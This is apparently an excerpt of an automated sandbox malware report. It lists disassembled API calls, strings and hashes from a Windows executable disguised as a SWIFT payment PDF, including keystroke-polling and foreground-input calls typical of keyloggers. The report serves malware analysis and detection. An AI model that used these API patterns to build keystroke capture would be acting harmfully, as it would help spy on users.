                                                        APIs
                                                        • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                        • GetKeyState.USER32(000000A0), ref: 00444E26
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                        • GetKeyState.USER32(000000A1), ref: 00444E51
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                        • GetKeyState.USER32(00000011), ref: 00444E77
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                        • GetKeyState.USER32(00000012), ref: 00444E9D
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                        • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                        • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                        • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                        • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                                                        • _wcslen.LIBCMT ref: 00450944
                                                        • _wcscat.LIBCMT ref: 00450955
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                        • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcscat_wcslen
                                                        • String ID: -----$SysListView32
                                                        • API String ID: 4008455318-3975388722
                                                        • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                        • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                                        • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                        • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                        APIs
                                                        • _memset.LIBCMT ref: 00448625
                                                        • CreateMenu.USER32 ref: 0044863C
                                                        • SetMenu.USER32(?,00000000), ref: 0044864C
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                                        • IsMenu.USER32(?), ref: 004486EB
                                                        • CreatePopupMenu.USER32 ref: 004486F5
                                                        • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                                        • DrawMenuBar.USER32 ref: 00448742
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                        • String ID: 0
                                                        • API String ID: 176399719-4108050209
                                                        • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                        • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                        • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                        • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                        APIs
                                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                        • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                        • GetParent.USER32 ref: 004692A4
                                                        • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                        • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                        • GetParent.USER32 ref: 004692C7
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 2040099840-1403004172
                                                        • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                        • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                        • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                        • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                        APIs
                                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                        • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                        • GetParent.USER32 ref: 0046949E
                                                        • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                        • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                        • GetParent.USER32 ref: 004694C1
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 2040099840-1403004172
                                                        • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                        • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                        • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                        • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                        APIs
                                                          • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                        • SendMessageW.USER32(75C123D0,00001001,00000000,00000000), ref: 00448E73
                                                        • SendMessageW.USER32(75C123D0,00001026,00000000,00000000), ref: 00448E7E
                                                          • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                        • String ID:
                                                        • API String ID: 3771399671-0
                                                        • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                        • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                        • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                        • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                        • String ID:
                                                        • API String ID: 3413494760-0
                                                        • Opcode ID: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
                                                        • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                        • Opcode Fuzzy Hash: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
                                                        • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                        • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                        • String ID:
                                                        • API String ID: 2156557900-0
                                                        • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                        • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                        • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                        • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __wcsicoll
                                                        • String ID: 0%d$DOWN$OFF
                                                        • API String ID: 3832890014-468733193
                                                        • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                        • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                        • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                        • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                        APIs
                                                        • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                        • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                        • VariantClear.OLEAUT32 ref: 0045E970
                                                        • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                        • __swprintf.LIBCMT ref: 0045EB1F
                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                        • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                        Strings
                                                        • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                        • String ID: %4d%02d%02d%02d%02d%02d
                                                        • API String ID: 43541914-1568723262
                                                        • Opcode ID: a2eaea5add9244eda0439c65082e9b6a3ded594ae524bbc7a03bff614a295487
                                                        • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                        • Opcode Fuzzy Hash: a2eaea5add9244eda0439c65082e9b6a3ded594ae524bbc7a03bff614a295487
                                                        • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                        APIs
                                                        • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                        • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                        • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: DecrementInterlocked$Sleep
                                                        • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                        • API String ID: 2250217261-3412429629
                                                        • Opcode ID: 259a8d3968bbabb0e43eb8f22aa2195a71f663abf8571a10d24c6569a0fcc496
                                                        • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                        • Opcode Fuzzy Hash: 259a8d3968bbabb0e43eb8f22aa2195a71f663abf8571a10d24c6569a0fcc496
                                                        • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                        • API String ID: 0-1603158881
                                                        • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                        • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                        • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                        • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                        APIs
                                                        • _memset.LIBCMT ref: 00479D1F
                                                        • VariantInit.OLEAUT32(?), ref: 00479F06
                                                        • VariantClear.OLEAUT32(?), ref: 00479F11
                                                        • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                          • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                          • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                          • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                        • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                          • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                        • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                        • API String ID: 665237470-60002521
                                                        • Opcode ID: 793fb3cba325991d4fff1cbe39f2f77c8d95d4c05e7f98abc44eb3337f950ab1
                                                        • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                        • Opcode Fuzzy Hash: 793fb3cba325991d4fff1cbe39f2f77c8d95d4c05e7f98abc44eb3337f950ab1
                                                        • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                        APIs
                                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ConnectRegistry_wcslen
                                                        • String ID: HH
                                                        • API String ID: 535477410-2761332787
                                                        • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                        • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                        • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                        • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                        APIs
                                                        • _memset.LIBCMT ref: 0045F317
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                        • IsMenu.USER32(?), ref: 0045F380
                                                        • CreatePopupMenu.USER32 ref: 0045F3C5
                                                        • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                        • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                        • String ID: 0$2
                                                        • API String ID: 3311875123-3793063076
                                                        • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                        • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                        • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                        • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe), ref: 0043719E
                                                        • LoadStringW.USER32(00000000), ref: 004371A7
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                        • LoadStringW.USER32(00000000), ref: 004371C0
                                                        • _printf.LIBCMT ref: 004371EC
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                        Strings
                                                        • C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe, xrefs: 00437189
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                        Memory Dump Source
